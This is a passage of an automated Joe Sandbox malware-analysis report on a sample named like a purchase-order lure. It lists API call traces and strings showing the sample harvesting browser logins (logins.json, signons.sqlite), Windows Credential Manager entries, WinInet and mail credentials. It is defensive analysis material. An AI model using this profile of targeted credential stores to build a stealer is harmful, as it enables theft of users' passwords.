                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                      • API String ID: 231171946-2189169393
                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 633282248-1996832678
                                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 3402215030-3842416460
                                                                                                      • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                      • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                      • API String ID: 2003275452-3138536805
                                                                                                      • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                      • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                      • API String ID: 1012775001-1343505058
                                                                                                      • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                      • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                      • String ID: salu
                                                                                                      • API String ID: 3691931180-4177317985
                                                                                                      • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2449869053-232097475
                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                      APIs
                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                      APIs
                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                      APIs
                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                      • String ID: \systemroot
                                                                                                      • API String ID: 912701516-1821301763
                                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                      APIs
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                      • API String ID: 3318079752-260894208
                                                                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 888011440-2039793938
                                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
